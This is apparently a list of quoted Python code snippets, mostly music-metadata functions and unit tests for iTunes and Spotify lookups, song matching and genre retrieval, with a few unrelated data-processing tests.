song.artist_name.lower():\n if 'collection_name' not in data.keys():\n return song\n elif data['collection_name'].lower() in song.collection_name.lower():\n return song\n elif data['track_name']:\n return itunespy.search_track(data['track_name'])\n elif data['artist_name']:\n songs = []\n artists = itunespy.search_artist(data['artist_name'])[0]\n for album in artists.get_albums():\n for song in album.get_tracks():\n songs.append(song)\n return songs\n # Attempt to find a close match if no exact matches\n song = itunespy.search(' '.join([data['track_name'], data['artist_name'], data['collection_name']]))[0]\n if song:\n return song\n except LookupError as err:\n if exit_fail:\n logging.warning(Fore.RED+'✘ '+Style.RESET_ALL+str(err))\n sys.exit()", "def test_readSongData():\n\n # check type\n assert isinstance(song_df, pd.DataFrame)\n\n # check shape\n assert song_df.shape == (1972060, 8)", "def test_get_voice_datasets(self):\n pass", "def test_selecting_only_audio_episodes(\n only_audio_episodes: List[LepEpisode],\n) -> None:\n assert len(only_audio_episodes) == 14 # Without duplicates", "def test_audio_features(self):\n\n # 1ehPJRt49h6N0LoryqKZXq, 8737: How Far I'll Go (Alessia Cara Version) by Alessia Cara\n # 2fGFaTDbE8aS4f31fM0XE4, 5037: Pop 101 (feat. Anami Vice) by Marianas Trench\n targets = {8737: {'danceability': 0.317,\n 'energy': 0.562,\n 'key': 9,\n 'loudness': -9.609,\n 'mode': 1,\n 'speechiness': 0.395,\n 'acousticness': 0.124,\n 'instrumentalness': 0.000144,\n 'liveness': 0.0667,\n 'valence': 0.127,\n 'tempo': 181.100,\n 'duration_ms': 175507,\n 'time_signature': 4,\n },\n 5037: {'danceability': 0.756,\n 'energy': 0.658,\n 'key': 11,\n 'loudness': -6.128,\n 'mode': 0,\n 'speechiness': 0.202,\n 'acousticness': 0.0581,\n 'instrumentalness': 0,\n 'liveness': 0.0674,\n 'valence': 0.640,\n 'tempo': 120.018,\n 'duration_ms': 247829,\n 'time_signature': 4,\n },\n }\n\n results = {track.i_id: track for track in self.tracks if track.i_id in targets}\n\n for target, expecteds in targets.iteritems():\n result = results[target]\n for key, expected in expecteds.iteritems():\n self.assertEqual(result.__getattr__(key), expected)", "def spotifySearch(request,genre):\n\tif genre in genre_artist.keys():\n\t\ttracks = top_tracks(genre)\n\t\tif tracks:\n\t\t\treturn HttpResponse(json.dumps(tracks))\n\t\telse:\n\t\t\tresponse ={\"message\":\"Artist/track is not found.\", \"error\":True}\n\t\t\treturn HttpResponse(json.dumps(response))\n\telse:\n\t\tresponse = {\"message\": \"Please give an existed genre as a parameter. 
Genres are: rock, alternative rock, pop, blues, country, electronic, jazz, r&b, rap, reggae.\", \"error\":True}\n\t\treturn HttpResponse(json.dumps(response))", "def test_get_sample_ids(self):\n self.assertEqual(get_sample_ids(self.map_data, self.map_headers,\\\n parse_metadata_state_descriptions('Study:Twin')), [])\n self.assertEqual(get_sample_ids(self.map_data, self.map_headers,\\\n parse_metadata_state_descriptions('Study:Dog')), ['a','b'])\n self.assertEqual(get_sample_ids(self.map_data, self.map_headers,\\\n parse_metadata_state_descriptions('Study:*,!Dog')), ['c','d','e'])\n self.assertEqual(get_sample_ids(self.map_data, self.map_headers,\\\n parse_metadata_state_descriptions('Study:*,!Dog;BodySite:Stool')), ['e'])\n self.assertEqual(get_sample_ids(self.map_data, self.map_headers,\\\n parse_metadata_state_descriptions('BodySite:Stool')), ['a','b','e'])", "def test_get_songs_by_artist(self, track_elms, service_config, request):\n artist_id = uuid.UUID(avalon.compat.to_uuid_input('2221930a-f28d-44ed-856b-c84b35f76713'))\n service_config.track_store.get_by_artist.return_value = track_elms\n service_config.id_cache.get_artist_id.return_value = artist_id\n request.args['artist'] = 'Artist'\n params = avalon.web.request.Parameters(request)\n\n service = avalon.web.services.AvalonMetadataService(service_config)\n results = service.get_songs(params)\n\n assert results == track_elms, 'Expected matching tracks returned'\n service_config.track_store.get_by_artist.assert_called_with(artist_id)", "def test_get_sample_ids(self):\r\n self.assertEqual(get_sample_ids(self.map_data, self.map_headers,\r\n parse_metadata_state_descriptions('Study:Twin')), [])\r\n self.assertEqual(get_sample_ids(self.map_data, self.map_headers,\r\n parse_metadata_state_descriptions('Study:Dog')), ['a', 'b'])\r\n self.assertEqual(get_sample_ids(self.map_data, self.map_headers,\r\n parse_metadata_state_descriptions('Study:*,!Dog')), ['c', 'd', 'e'])\r\n self.assertEqual(get_sample_ids(self.map_data, self.map_headers,\r\n parse_metadata_state_descriptions('Study:*,!Dog;BodySite:Stool')), ['e'])\r\n self.assertEqual(get_sample_ids(self.map_data, self.map_headers,\r\n parse_metadata_state_descriptions('BodySite:Stool')), ['a', 'b', 'e'])", "def get_artist_genres(artist_id):\n profile_endpoint = 'https://api.spotify.com/v1/artists/' + artist_id\n\n r = requests.get(profile_endpoint)\n print r.status_code\n \n if r.status_code != 200:\n return None\n artist_info = r.json()\n genre_names = artist_info['genres']\n genres = [Genre(name=genre) for genre in genre_names]\n print genres\n return genres", "def prepare_mirex_lastfmapi_dataset(which='mirex'):\n assert which in ['lastfmapi', 'mirex']\n\n raw_folder_path = f\"{raw_dataset_path}/dataset_similarity_oramas_et_al\"\n preprocessed_folder_path = f\"{preprocessed_dataset_path}/similarity/{which}\"\n os.makedirs(preprocessed_folder_path, exist_ok=True)\n musicbrainzngs_setup()\n\n # create items.json:\n # an entry for every artist present in mirex_gold.txt, including also those in the top-n most similar list.\n\n artists = []\n with open(f\"{raw_folder_path}/{which}_gold.txt\") as f:\n for line in f.read().split('\\n')[:-1]:\n\n # artists with a ground truth of less than 10 items should be excluded, according to the paper\n if len(line.split('\\t')[1].split(' ')) >= 10:\n artists += [line.split('\\t')[0]]+line.split('\\t')[1].split(' ')\n\n artists = list(set(artists))\n items = []\n for a in tqdm(artists):\n artist_name = musicbrainzngs.get_artist_by_id(a)['artist']['name']\n d 
= {\n 'id': a,\n 'seed': {\n 'artist_musicbrainz_id': a,\n 'artist_name': artist_name,\n }\n }\n items.append(d)\n\n with open(f\"{preprocessed_folder_path}/items.json\", 'w', encoding='utf-8') as f:\n json.dump(items, f, ensure_ascii=False, indent=4)\n\n # create similar_items_ground_truth.json\n\n ground_truth_validation = {}\n ground_truth_test = {}\n with open(f\"{raw_folder_path}/{which}_gold.txt\") as f:\n for line in f.read().split('\\n')[:-1]:\n\n # artists with a ground truth of less than 10 items should be excluded, according to the paper\n if len(line.split('\\t')[1].split(' ')) >= 10:\n held_out = line.split('\\t')[1].split(' ')\n\n sample = random.sample(held_out, len(held_out))\n sample_validation = sample[:len(sample)//2]\n sample_test = sample[len(sample)//2:]\n ground_truth_validation[line.split('\\t')[0]] = sample_validation\n ground_truth_test[line.split('\\t')[0]] = sample_test\n\n with open(f\"{preprocessed_folder_path}/similar_items_ground_truth_validation.json\", 'w', encoding='utf-8') as f:\n json.dump(ground_truth_validation, f, ensure_ascii=False, indent=4)\n\n with open(f\"{preprocessed_folder_path}/similar_items_ground_truth_test.json\", 'w', encoding='utf-8') as f:\n json.dump(ground_truth_test, f, ensure_ascii=False, indent=4)", "def test_song_counts(self):\n self.assertEqual(self.show.total_song_count, 19)\n self.assertEqual(self.show.set1_song_count, 9)\n self.assertEqual(self.show.set2_song_count, 8)\n self.assertEqual(self.show.set3_song_count, 0)\n self.assertEqual(self.show.encore_song_count, 1)\n self.assertEqual(self.show.encore2_song_count, 1)", "def test_sounds_get(self):\n pass", "def test_get_gm_track_artists_ft_2(self):\r\n gm_track = gmusic.GMusicTrack(\r\n title='MMXXX (ft Moor Mother)',\r\n artist='Earthmother'\r\n )\r\n expected = ['Earthmother', 'Moor Mother']\r\n actual = gmspotify.get_gm_track_artists(gm_track)\r\n self.assertEqual(actual, expected)", "def get_songs(path):\r\n song_list = []\r\n genre_paths = glob.glob(path + '/*')\r\n for genre_path in genre_paths:\r\n artist_paths = glob.glob(genre_path + '/*')\r\n for artist_path in artist_paths:\r\n album_paths = glob.glob(artist_path + '/*')\r\n for album_path in album_paths:\r\n lyrics_paths = glob.glob(album_path + '/*.txt')\r\n for lyrics_path in lyrics_paths:\r\n song = {}\r\n song[\"genre\"] = genre_path.replace(path + '/', '')\r\n song[\"artist\"] = artist_path.replace(genre_path + '/', '')\r\n song[\"album\"] = album_path.replace(artist_path + '/', '')\r\n song[\"lyrics\"] = open(lyrics_path).read()\r\n song[\"name\"] = lyrics_path[:-4].replace(album_path + '/', '')\r\n song[\"x\"] = 0\r\n song[\"y\"] = 0\r\n song_list.append(song)\r\n return song_list", "def test_ms_artist_search(helpers):\n common_tests(\n MSArtist,\n MS_ARTIST_SEARCH_XML,\n MS_ARTIST_SEARCH_DICT,\n \"00020064artistsearch:Fritjof\",\n helpers,\n )", "def test_get_songs_by_album_id(self, track_elms, service_config, request):\n album_id = uuid.UUID(avalon.compat.to_uuid_input('37cac253-2bca-4a3a-be9f-2ac655e04ad8'))\n service_config.track_store.get_by_album.return_value = track_elms\n request.args['album_id'] = six.text_type(album_id)\n params = avalon.web.request.Parameters(request)\n\n service = avalon.web.services.AvalonMetadataService(service_config)\n results = service.get_songs(params)\n\n assert results == track_elms, 'Expected matching tracks returned'\n service_config.track_store.get_by_album.assert_called_with(album_id)", "def test_check_gff():\n gene_list = []\n gene, gene_list= check_gff(INPUT_ok, 
gene_list)\n # print(gene, gene_list)\n assert_equal(gene, \"GPLIN_000000100\")\n assert_equal(gene_list, [\"GPLIN_000000100\"])", "def test_gather_success(self):\n gathered_items = self.Quant._gather(self.apple, self.test_stock_location_01)\n # Check the number of apple quants returned is correct\n self.assertEqual(len(gathered_items), 3)\n # Check that the products are all of expected type\n self.assertEqual(gathered_items.product_id, self.apple)\n\n # Unfold the returned quants\n _q1, second_quant, _q2 = gathered_items\n # Check when quant_ids is set in the context\n gathered_items_subset = self.Quant.with_context(quant_ids=[second_quant.id])._gather(\n self.apple, self.test_stock_location_01\n )\n self.assertEqual(len(gathered_items_subset), 1)\n self.assertEqual(gathered_items_subset.product_id, self.apple)\n self.assertEqual(gathered_items_subset, second_quant)", "def search_genres(self, needle):\n return self._genre_search.search(searchable(needle))", "def get_genres(self) -> List[Genre]:\n raise NotImplementedError", "def test_matching_tracks(self):\n\n # 5037: Pop 101 (feat. Anami Vice) by Marianas Trench\n # 8755 : Satisfied (feat. Miguel & Queen Latifah) by Sia\n # 6699 : Un Besito Mas (feat. Juan Luis Guerra) by Jesse & Joy\n targets = {5037: '2fGFaTDbE8aS4f31fM0XE4',\n 8755: '1ybJ2itxCxPCPkcA9sOgTO',\n 6699: '1182pxG4uNxr3QqIH8b8k0',\n }\n\n matches = {track.i_id: track.id\n for track in self.tracks\n if track.i_id in targets}\n\n for i_id, s_id in targets.iteritems():\n self.assertEqual(s_id, matches[i_id])", "def get_all_genres(self):\n self.cursor.execute(\"select * from genres\")\n self.connection.commit()\n return self.cursor.fetchall()", "def test_genius(self):\n bad_res = lw.get_lyrics('genius', 'eminem', 'los yourself')\n good_res = lw.get_lyrics('genius', 'eminem', 'lose yourself')\n self.assertEqual(bad_res, 404)\n self.assertTrue(good_res)", "def _get_artists_genre(self, track_df):\n\n sp = self.spotify_clients['user-library-read']\n artistid_to_genre = {}\n\n \"\"\"\n TODO\n Get genre by each artist_id is slow,\n but I got some problems when I use spotipy's artists function\n \"\"\"\n\n for artist_id in track_df['artist_id'].tolist():\n result = sp.artist(artist_id)\n artist_id = result['id']\n genres = result['genres']\n\n if len(genres) == 0:\n continue\n else:\n artistid_to_genre[artist_id] = genres\n\n return artistid_to_genre", "def test_items(self):\n obs = self.tester.items()\n self.assertTrue(isinstance(obs, Iterable))\n exp = [('1.SKB1.640202', PrepSample('1.SKB1.640202', self.tester)),\n ('1.SKB2.640194', PrepSample('1.SKB2.640194', self.tester)),\n ('1.SKB3.640195', PrepSample('1.SKB3.640195', self.tester)),\n ('1.SKB4.640189', PrepSample('1.SKB4.640189', self.tester)),\n ('1.SKB5.640181', PrepSample('1.SKB5.640181', self.tester)),\n ('1.SKB6.640176', PrepSample('1.SKB6.640176', self.tester)),\n ('1.SKB7.640196', PrepSample('1.SKB7.640196', self.tester)),\n ('1.SKB8.640193', PrepSample('1.SKB8.640193', self.tester)),\n ('1.SKB9.640200', PrepSample('1.SKB9.640200', self.tester)),\n ('1.SKD1.640179', PrepSample('1.SKD1.640179', self.tester)),\n ('1.SKD2.640178', PrepSample('1.SKD2.640178', self.tester)),\n ('1.SKD3.640198', PrepSample('1.SKD3.640198', self.tester)),\n ('1.SKD4.640185', PrepSample('1.SKD4.640185', self.tester)),\n ('1.SKD5.640186', PrepSample('1.SKD5.640186', self.tester)),\n ('1.SKD6.640190', PrepSample('1.SKD6.640190', self.tester)),\n ('1.SKD7.640191', PrepSample('1.SKD7.640191', self.tester)),\n ('1.SKD8.640184', 
PrepSample('1.SKD8.640184', self.tester)),\n ('1.SKD9.640182', PrepSample('1.SKD9.640182', self.tester)),\n ('1.SKM1.640183', PrepSample('1.SKM1.640183', self.tester)),\n ('1.SKM2.640199', PrepSample('1.SKM2.640199', self.tester)),\n ('1.SKM3.640197', PrepSample('1.SKM3.640197', self.tester)),\n ('1.SKM4.640180', PrepSample('1.SKM4.640180', self.tester)),\n ('1.SKM5.640177', PrepSample('1.SKM5.640177', self.tester)),\n ('1.SKM6.640187', PrepSample('1.SKM6.640187', self.tester)),\n ('1.SKM7.640188', PrepSample('1.SKM7.640188', self.tester)),\n ('1.SKM8.640201', PrepSample('1.SKM8.640201', self.tester)),\n ('1.SKM9.640192', PrepSample('1.SKM9.640192', self.tester))]\n # Creating a list and looping over it since unittest does not call\n # the __eq__ function on the objects\n for o, e in zip(sorted(list(obs)), sorted(exp)):\n self.assertEqual(o, e)", "def samples_set(self):\n self.get_samples_set(self.samples_db)\n self.choose_samples(self.chosen_samples_db, self.chosen_hashes)", "def test_get_gm_track_artists_ampersand(self):\r\n gm_track = gmusic.GMusicTrack(\r\n title='Zhao Hua', artist='HVAD & Pan Daijing')\r\n expected = ['HVAD', 'Pan Daijing']\r\n actual = gmspotify.get_gm_track_artists(gm_track)\r\n self.assertEqual(actual, expected)", "def test_iter_variants(self):\n # We expect the variants in the same order as the BIM.\n expected = [\n truth.variants[\"rs785467\"],\n truth.variants[\"rs146589823\"],\n truth.variants[\"rs9628434\"],\n truth.variants[\"rs140543381\"],\n ]\n\n with self.reader_f() as f:\n for i, v in enumerate(f.iter_variants()):\n self.assertEqual(v, expected[i])\n\n self.assertEqual(i, len(expected) - 1) # All variants were iterated.", "def add_songs(self, artist_list):\n\n \"Terms that identify songs that aren't really songs\"\n conn = self.conn\n conn.text_factory = str\n c = conn.cursor()\n\n if artist_list is None:\n return \"You must provide a list of artists for whom to find songs.\"\n else:\n for artist in artist_list:\n print(\"Finding songs for \" + artist)\n all_songs_by_artist = pygenius_songs.findAllSongs(artist)\n already_scraped = list()\n for song in all_songs_by_artist:\n url = song[0]\n title = song[1]\n print(title)\n c.execute(\"SELECT count(*) FROM songs WHERE title = (?) 
AND artist = (?)\", (title, artist))\n check_in_db = c.fetchall()\n if check_in_db[0][0] == 0:\n if title not in already_scraped:\n if not [i for i, x in enumerate(self.bad_terms) if x in title]:\n already_scraped.append(title)\n c.execute('INSERT INTO songs(title, artist, url) values (?,?,?)', (title, artist, url))\n conn.commit()", "def test_ms_album_search(helpers):\n item_from_xml, item_from_dict = common_tests(\n MSAlbum,\n MS_ALBUM_SEARCH_XML,\n MS_ALBUM_SEARCH_DICT,\n \"00020064albumsearch:de unge\",\n helpers,\n )\n getter_attributes_test(\n \"artist\", item_from_xml, item_from_dict, MS_ALBUM_SEARCH_DICT.get(\"artist\")\n )\n getter_attributes_test(\n \"uri\", item_from_xml, item_from_dict, MS_ALBUM_SEARCH_DICT[\"uri\"]\n )", "def get_audios_and_labels(data_dir: str) -> (List[Any], List[int]):\n test_dataset = get_dataset(data_dir)\n test_audios = []\n test_labels = []\n for audio, label in test_dataset:\n test_audios.append(audio.numpy())\n test_labels.append(label.numpy())\n test_audios = np.array(test_audios)\n test_labels = np.array(test_labels)\n return test_audios, test_labels", "def find_song_recommendations(access_token, tracks, target, n, params):\n track_string = '%2C'.join(tracks[:5])\n response = spotify.get_recommendations(access_token, 50, track_string, params)\n\n song_recommendation = response['tracks']\n recommendations = {song['id']: {'name': song['name']} for song in song_recommendation}\n\n moods = get_features_moods(recommendations)\n\n return order_songs(moods, target, n)", "def test_get_songs_by_artist_id(self, track_elms, service_config, request):\n artist_id = uuid.UUID(avalon.compat.to_uuid_input('75d590d1-9f3d-462d-8264-0d16af227860'))\n service_config.track_store.get_by_artist.return_value = track_elms\n request.args['artist_id'] = six.text_type(artist_id)\n params = avalon.web.request.Parameters(request)\n\n service = avalon.web.services.AvalonMetadataService(service_config)\n results = service.get_songs(params)\n\n assert results == track_elms, 'Expected matching tracks returned'\n service_config.track_store.get_by_artist.assert_called_with(artist_id)", "def test_loadData():\n \n sys = LVsystem.Ecosystem()\n \n sys.loadSetup('2Prey1Predator')\n \n \n data = sys.create_data()\n \n assert data[0] == 3\n assert data[1] == ['rabbit', 'hen', 'fox']\n assert data[2] == [30,10,20]\n assert data[3] == [0.09,0.07,-0.06] \n assert data[4] == [10000,10000,1]\n assert data[5] == [400,500,250]\n assert data[6][1][2] == -data[6][2][1]\n assert data[6][2][2] == 0\n\n sys.removeSpecies('rabbit')\n sys.removeSpecies('fox')\n sys.removeSpecies('hen')", "def matchGenres(toPredictGenresString, toCompareGenresString):\n\n #Get the sets of genres\n toPredictGenres = str(toPredictGenresString).split(\"|\")\n toCompareGenres = str(toCompareGenresString).split(\"|\")\n\n toCompareGenresSet = set(toCompareGenres)\n\n commonCount = 0\n\n #Count how many are common to the two sets\n for genre in toPredictGenres:\n if genre in toCompareGenresSet:\n commonCount += 1\n\n #Return 100 times the proportion in both\n return 100 * commonCount/len(toPredictGenres)", "def test_csv(test_data,tmp_path):\n\n for d in test_data:\n\n gpm = GenotypePhenotypeMap(genotype=d[\"genotype\"],\n wildtype=d[\"wildtype\"],\n phenotype=d[\"phenotype\"],\n uncertainty=d[\"uncertainty\"])\n\n # Write out a csv file\n out_file = os.path.join(tmp_path,\"tmp.csv\")\n gpm.to_csv(out_file,index=False)\n assert os.path.exists(out_file)\n\n gpm_read = gpmap.read_csv(out_file,wildtype=d[\"wildtype\"])\n\n # Make 
sure the written and read gpmaps ar ethe same\n conftest.compare_gpmap(gpm,gpm_read)\n\n # Do not give wildtype. Should still work because the wildtype was\n # inferred.\n gpm_read = gpmap.read_csv(out_file)\n conftest.compare_gpmap(gpm,gpm_read)\n\n # Check ability to read labels back in\n site_labels = [f\"{x}\" for x in range(10,10+len(d[\"wildtype\"]),1)]\n gpm = GenotypePhenotypeMap(genotype=d[\"genotype\"],\n wildtype=d[\"wildtype\"],\n site_labels=site_labels)\n out_file = os.path.join(tmp_path,\"tmp.csv\")\n gpm.to_csv(out_file)\n\n gpm_read = gpmap.read_csv(out_file)\n\n for i in range(len(gpm_read.site_labels)):\n\n # Skip virtual site_labels added for invariant sites\n if len(d[\"mutations\"][i]) == 1:\n continue\n\n assert gpm_read.site_labels[i] == gpm.site_labels[i]\n\n # Read in with bad wildtype. Should throw warning and then have\n # sequential site labels.\n with pytest.warns(UserWarning):\n gpm_read = gpmap.read_csv(out_file,wildtype=d[\"mutant\"])\n\n assert np.array_equal(gpm_read.site_labels,range(len(d[\"wildtype\"])))", "def test_all_good(self):\n self.driver.start_sampling()\n\n self.create_sample_data_set_dir(\n \"node59p1_all_good1.dat\",\n TELEM_DIR,\n \"node59p1.dat\"\n )\n self.assert_data(\n (DostadParserTelemeteredDataParticle, DostadParserTelemeteredMetadataDataParticle),\n 'test_data_1-2.txt.result.yml',\n count=3\n )\n\n self.create_sample_data_set_dir(\n \"node59p1_all_good.dat\",\n TELEM_DIR,\n \"node59p1.dat\"\n )\n self.assert_data(\n DostadParserTelemeteredDataParticle,\n 'test_data_all_good.txt.result.yml',\n count=1\n )", "def __set_info_from_itunes(self, data: Any, query: str) -> None:\n if data['resultCount'] == 0:\n return\n Logger.Logger.log('Processing metadata from iTunes...')\n index: int = 0\n if data['resultCount'] != 1 and not Config.Config.get_strict_meta():\n Logger.Logger.log('Multiple results returned by iTunes, filtering them...')\n index = Song.__filter_itunes_results(data['results'], query)\n data = data['results'][index]\n # Add support for album artist and composer.\n self.title = data['trackName']\n self.artist = data['artistName']\n self.album_artist = data['artistName']\n self.genre = data['primaryGenreName']\n self.album = data['collectionName']\n release_date: datetime = datetime.strptime(data['releaseDate'], '%Y-%m-%dT%H:%M:%SZ')\n self.year = release_date.year\n self.cover_url = data['artworkUrl100'].replace('100x100bb.jpg', '1000x1000bb.jpg')\n self.disc_count = data['discCount']\n self.disc_number = data['discNumber']\n self.track_count = data['trackCount']\n self.track_number = data['trackNumber']\n # TODO: Currently iTunes doesn't support information about group and composer.\n # self.group = data['artistName']\n # self.composer = data['artistName']\n if data['trackExplicitness'] == 'explicit':\n self.explicit = True\n else:\n self.explicit = False\n self.album_url = data['artistViewUrl']\n self.track_url = data['trackViewUrl']", "def test_testGenerator():\n\n # check type\n assert isinstance(testset, list)\n\n # check the shape\n assert len(testset)==newObs.shape[0]", "def check_frequencies(self, args):\n\n for file in args.frequencies:\n self._check_valid_file(file[0])", "def checkid3(filename):\n datas = None\n mdat = None\n\n try:\n mdat = mutagen.File(filename, easy=True)\n except:\n msg = \"mutagen failed %s\" % sys.exc_value\n Logs.objects.create(filename=filename, message=msg)\n\n if mdat is not None:\n try:\n genre = mdat['genre'][0]\n except:\n genre = ''\n\n try:\n datas = {'artist': mdat['artist'][0],\n 
'album': mdat['album'][0],\n 'title': mdat['title'][0],\n 'genre': genre}\n except KeyError:\n msg = \"%s : %s is not in the list.\" % (str(sys.exc_type),\n sys.exc_value)\n Logs.objects.create(filename=filename, message=msg)\n\n return datas", "def song_search_matching(chart_song, query):\n song_searches = song_search(query, NUM_SONG_SEARCH_RESULTS)\n if 'error' in song_searches:\n print('>>> error:', song_searches['error'])\n return\n\n songs = []\n # print(song_searches)\n for s in song_searches['songs']:\n # print('test song:', s)\n performers = ' '.join(x['name'] for x in s['performers']).lower()\n\n print('checking performers:', performers, 'vs.', chart_song.artist.lower())\n print('checking titles:', '\"' + s['title']['name'] + '\"', 'vs.', '\"' + chart_song.title + '\"')\n diff1 = fuzz.token_set_ratio(chart_song.artist.lower(), performers)\n diff2 = difflib.SequenceMatcher(\n None,\n a=s['title']['name'].lower(),\n b=chart_song.title.lower()\n ).ratio()\n print('performer score:', diff1, 'and title score:', diff2)\n if diff1 >= 65 and diff2 > 0.75:\n songs.append(s)\n print('song passed with diff performers of', diff1, 'and diff title of', diff2)\n if diff1 <= 75 or diff2 < 0.85:\n print('NOTE impartial match?', s, 'for', chart_song)\n\n return songs", "def test_too_many_songs(self):\n artist = Artist.objects.create(name='Artist', normname='artist')\n album = Album.objects.create(artist=artist, name='Album', normname='album')\n for num in range(501):\n Song.objects.create(filename='file%03d.mp3' % (num+1),\n artist=artist,\n album=album,\n title='Title %03d' % (num+1),\n year=0,\n tracknum=0,\n normtitle='title %03d' % (num+1),\n raw_artist='artist',\n filetype=Song.MP3,\n bitrate=128000,\n mode=Song.CBR,\n size=123000,\n length=90,\n sha256sum='0cf31fc7d968ec16c69758f9b0ebb2355471d5694a151b40e5e4f8641b061092',\n )\n\n response = self.client.get(reverse('exordium:artist', args=(artist.normname,)))\n self.assertEqual(response.status_code, 200)\n self.assertQuerysetEqual(response.context['albums'].data, [repr(album)])\n self.assertEqual(response.context['have_songs'], False)\n self.assertNotIn('songs', response.context)\n self.assertNotContains(response, 'Songs by %s' % (artist))\n self.assertContains(response, reverse('exordium:artist', args=(artist.normname,)))\n self.assertContains(response, reverse('exordium:album', args=(album.pk,)))\n self.assertContains(response, '1 album')\n self.assertNotContains(response, '1 song')", "def extract_data():\n args = arguments()\n\n if args.list is not None:\n songs = utility.get_songs(args.list)\n logger.debug(str(songs))\n if len(songs) != 0:\n logger.info(\"Downloading songs in {}\".format(args.list))\n for song_name in songs:\n logger.debug(song_name)\n args.SONG_NAME = [song_name]\n main(args)\n else:\n logger.info(\"{}: is empty\".format(args.list))\n elif args.SONG_NAME and yt.is_playlist(args.SONG_NAME[0]):\n logger.info(\"Youtube playlist passed...extracting!\")\n songs, playlist_name = yt.get_playlist(\n args.SONG_NAME[0],\n args.proxy,\n args.pl_start,\n args.pl_end,\n args.pl_items\n )\n\n # Check if data is actually returned\n if songs is None:\n logger.error(\"Couldn't extract playlist data!\")\n\n logger.info(\"Playlist: {}\".format(playlist_name))\n logger.info(\"{} songs found\".format(len(songs)))\n\n # Iterate and work on the data.\n url_base = \"https://www.youtube.com/watch?v=\"\n for song in songs:\n args.url = url_base + song[\"url\"]\n\n # Try to pass the title as well, if it's not there\n # that will be handled by 
ytmdl\n try:\n args.SONG_NAME = [stringutils.remove_yt_words(song[\"title\"])]\n except KeyError:\n pass\n\n main(args)\n else:\n main(args)", "def test_get_s_track_artists(self):\r\n sp_track = spotify.SpAlbumTrack(munch.munchify({'artists': [{'external_urls': {'spotify': 'https://open.spotify.com/artist/25BObiRSDCMwVrBGIVaLIf'}, 'href': 'https://api.spotify.com/v1/artists/25BObiRSDCMwVrBGIVaLIf', 'id': '25BObiRSDCMwVrBGIVaLIf', 'name': 'James K', 'type': 'artist', 'uri': 'spotify:artist:25BObiRSDCMwVrBGIVaLIf'}, {'external_urls': {'spotify': 'https://open.spotify.com/artist/1g80vffuPrdapR6S4WyxN3'}, 'href': 'https://api.spotify.com/v1/artists/1g80vffuPrdapR6S4WyxN3', 'id': '1g80vffuPrdapR6S4WyxN3', 'name': 'Eve Essex', 'type': 'artist', 'uri': 'spotify:artist:1g80vffuPrdapR6S4WyxN3'}], 'available_markets': ['AD', 'AE', 'AR', 'AT', 'AU', 'BE', 'BG', 'BH', 'BO', 'BR', 'CA', 'CH', 'CL', 'CO', 'CR', 'CY', 'CZ', 'DE', 'DK', 'DO', 'DZ', 'EC', 'EE', 'EG', 'ES', 'FI', 'FR', 'GB', 'GR', 'GT', 'HK', 'HN',\r\n 'HU', 'ID', 'IE', 'IL', 'IN', 'IS', 'IT', 'JO', 'JP', 'KW', 'LB', 'LI', 'LT', 'LU', 'LV', 'MA', 'MC', 'MT', 'MX', 'MY', 'NI', 'NL', 'NO', 'NZ', 'OM', 'PA', 'PE', 'PH', 'PL', 'PS', 'PT', 'PY', 'QA', 'RO', 'SA', 'SE', 'SG', 'SK', 'SV', 'TH', 'TN', 'TR', 'TW', 'US', 'UY', 'VN', 'ZA'], 'disc_number': 1, 'duration_ms': 260446, 'explicit': False, 'external_urls': {'spotify': 'https://open.spotify.com/track/1mh4GpKKrmlaUkVzoNqhRt'}, 'href': 'https://api.spotify.com/v1/tracks/1mh4GpKKrmlaUkVzoNqhRt', 'id': '1mh4GpKKrmlaUkVzoNqhRt', 'is_local': False, 'name': 'Stretch Deep - feat. Eve Essex', 'preview_url': 'https://p.scdn.co/mp3-preview/ebb7e70b97a5d29e05044a1f920d1fc594f92b26?cid=ea3ef49a097b42d682d3c7bc98832d65', 'track_number': 12, 'type': 'track', 'uri': 'spotify:track:1mh4GpKKrmlaUkVzoNqhRt'}))\r\n expected = ['Eve Essex', 'James K']\r\n actual = gmspotify.get_sp_track_artists(sp_track)\r\n self.assertEqual(actual, expected)", "def test_genomic(self):\n self.c.execute(\"\"\"select expIds,expScores from genomic_test\"\"\")\n rows = self.c.fetchall()\n self.assertEqual(len(rows), 1) # one probe\n self.assertEqual(rows[0][0], '0,1,2,3,4') # ordered by sample id\n values = map(lambda x: float(x), rows[0][1].split(',')) # scores are in correct order\n self.assertTrue(values[0] - 0.479005065149792 < self.tolerance)\n self.assertTrue(values[1] - 25.1 < self.tolerance)\n self.assertTrue(values[2] - 5.3 < self.tolerance)\n self.assertTrue(values[3] - 3.1 < self.tolerance)\n self.assertTrue(values[4] - -1.23 < self.tolerance)", "def test_accuracy():\n hits = 0\n total = 0\n # create_database()\n # gen_random_samples()\n song_to_id, id_to_song, hash_dict = load_database()\n for filename in os.listdir(\"Songs\"):\n sample_dict = hash_random_sample(filename)\n offset_dict, song_id = find_song(\n hash_dict, sample_dict, id_to_song)\n print(id_to_song[song_id])\n print(filename)\n if id_to_song[song_id] == filename:\n print(\"Success\")\n hits += 1\n else:\n print(\"Fail\")\n total += 1\n print((hits / total) * 100, \" %\")", "def test_get_songs_by_query(self, track_elms, service_config, request):\n service_config.search.search_tracks.return_value = track_elms\n request.args['query'] = 'Dummy'\n params = avalon.web.request.Parameters(request)\n\n service = avalon.web.services.AvalonMetadataService(service_config)\n results = service.get_songs(params)\n\n assert results == track_elms, 'Expected matching tracks returned'", "def test_check_all_ids(self):\r\n\r\n fasta_labels = ['sample1_1', 'sample1_2', 
'sample3_3', 'sample2_4']\r\n\r\n sample_ids = ['sample1', 'sample2', 'sample3']\r\n\r\n sample_ids_not_found = check_all_ids(fasta_labels, sample_ids)\r\n\r\n # should return True as all are found\r\n\r\n self.assertEqual(sample_ids_not_found, True)\r\n\r\n fasta_labels = ['sample1_1', 'sample1_2', 'sample3_3', 'sample2_4']\r\n\r\n sample_ids = ['sample1', 'sample2', 'sample3', 'sampleX']\r\n\r\n sample_ids_not_found = check_all_ids(fasta_labels, sample_ids)\r\n\r\n # sampleX should not be found\r\n\r\n self.assertEqual(sample_ids_not_found, ['sampleX'])", "def test_ms_track_search(helpers):\n item_from_xml, item_from_dict = common_tests(\n MSTrack,\n MS_TRACK_SEARCH_XML,\n MS_TRACK_SEARCH_DICT,\n \"00020064tracksearch:pilgrim\",\n helpers,\n )\n getter_attributes_test(\n \"artist\", item_from_xml, item_from_dict, MS_TRACK_SEARCH_DICT.get(\"artist\")\n )\n getter_attributes_test(\n \"uri\", item_from_xml, item_from_dict, MS_TRACK_SEARCH_DICT[\"uri\"]\n )", 